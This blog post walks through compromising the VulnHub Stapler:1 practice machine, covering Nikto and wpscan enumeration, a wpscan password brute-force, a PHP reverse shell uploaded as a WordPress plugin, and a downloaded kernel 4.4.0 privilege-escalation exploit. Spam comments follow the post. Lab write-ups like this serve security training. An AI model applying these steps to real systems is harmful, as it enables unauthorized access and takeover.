VulnHub Stapler:1
First
we determine the IP address assigned to the server.
We see that the server is on 192.168.213.134
I startup Sparta to scan the box..
We see that we have some interesting ports open. We first check ftp. We have anonymous login but no privileges to do anything
. We then turn our attention to the web ports. Port 80 turns up nothing.
We check port 12380 to find a landing page and nothing more.
We run Nikto on port 12380
We see that there is a SSL cert being used. And we find 2 entries - /admin112233 and /blogblog
Let's check out https://192.168.213.134:12380/admin112233
OK? Let's see what is on /blogblog
Look's like we have a Wordpress site. Let's tackle this one first - low hanging fruit!
We run wpscan and see if we can find any users...
wpscan --url https://192.168.213.134:12380/blogblog --enumerate u
OK, We have some users - Let's see if we can get some credentials from this.
John look's good to start with..
We run
wpscan --url https://192.168.213.134:12380/blogblog --wordlist /usr/share/wordlists/rockyou.txt --username john
And we get a hit.
Let's login to the WordPress site..
And we are in and we are an admin...SWEET!
From here is easy to up load a reverse shell using the Plugin feature...
We get our trusty PentestMonkey reverse php shell.. http://pentestmonkey.net/tools/web-shells/php-reverse-shell
And get it ready..
We start our nc listener on port 9978
Then in wordpress we upload our shell using the plugin feature..
'Upload Plugin'
We browse to our php shell
And install it..Easy as pie!
We go to the media section in wordpress and find our shell..
We go to the media section in wordpress and find our shell..
Click in the shell.php
And we see our link to use,...
We open a new tab in our browser and enter the url - https://192.168.213.134:12380/blogblog/wp-content/uploads/shell.php
We now have our limited shell...
We can see that this box is running Kernel 4.4.0 and after a quick search we find a possible exploit - https://www.exploit-db.com/exploits/39772/
We get the needed package and upload to the victim using wget.
Following the instructions from the exploit we extract the zip file. Then extract the tar file and cd into ebpf_mapfd_doubleput_exploit
From here we run ./compile.sh then ./doubleput
We wait for it...
We got you!
Not too bad. Now we know there are others ways in but this was the 1st run. We can go back and knock on other doors to find other ways in.
Thanks to
Hi
ReplyDeleteThe concept taken here will be useful for my future programs and i will surely implement them in my study.
Microsoft Windows Azure Training | Online Course | Certification in chennai | Microsoft Windows Azure Training | Online Course | Certification in bangalore | Microsoft Windows Azure Training | Online Course | Certification in hyderabad | Microsoft Windows Azure Training | Online Course | Certification in pune
This comment has been removed by a blog administrator.
ReplyDeleteMmorpg oyunları
ReplyDeleteInstagram Takipçi Satın Al
Tiktok Jeton Hilesi
tiktok jeton hilesi
antalya saç ekimi
instagram takipçi satın al
INSTAGRAM TAKİPCİ SATİN AL
metin2 pvp serverlar
ınstagram takipci satin al
çekmeköy arçelik klima servisi
ReplyDeleteataşehir arçelik klima servisi
maltepe samsung klima servisi
kadıköy samsung klima servisi
maltepe mitsubishi klima servisi
kadıköy mitsubishi klima servisi
kartal vestel klima servisi
ümraniye vestel klima servisi
pendik bosch klima servisi